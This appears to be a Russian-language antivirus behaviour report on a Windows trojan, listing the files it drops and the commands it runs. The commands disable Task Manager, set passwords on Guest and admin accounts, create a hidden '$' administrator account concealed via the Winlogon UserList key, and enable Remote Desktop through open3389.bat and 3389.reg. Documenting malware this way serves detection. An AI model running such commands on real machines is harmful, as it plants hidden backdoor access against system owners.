Техническая информация
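- Блокирует запуск Диспетчера задач (Taskmgr) — через параметр политики DisableTaskMgr, который устанавливается командой reg.exe ниже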
- '%WINDIR%\qd.exe'
- '<SYSTEM32>\gpupdate.exe'
- '<SYSTEM32>\net1.exe' user Guest yu19815109709
- '<SYSTEM32>\net1.exe' user Guest /active:yes
- '<SYSTEM32>\gpupdate.exe' /force
- '<SYSTEM32>\reg.exe' add hkcu\software\microsoft\windows\currentversion\policies\system /v DisableTaskMgr /t reg_dword /d 1 /f
- '<SYSTEM32>\net1.exe' user Adminisarator yu19815109709
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s Guest /add
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %USERNAME% /t reg_dword /d 00000001 /f
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\open3389.bat" "
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\admin.bat" "
- '<SYSTEM32>\wscript.exe' "%WINDIR%\1.vbs"
- '<SYSTEM32>\net1.exe' user %USERNAME%$ yu19815109709 /add
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %USERNAME%$ /t reg_dword /d 00000000 /f
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s %USERNAME%$ /add
- '%WINDIR%\regedit.exe' /s 3389.reg
- %WINDIR%\open3389.bat
- %WINDIR%\3389.reg
- %WINDIR%\qd.exe
- %WINDIR%\admin.bat
- %WINDIR%\1.vbs
- %WINDIR%\3389.reg
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''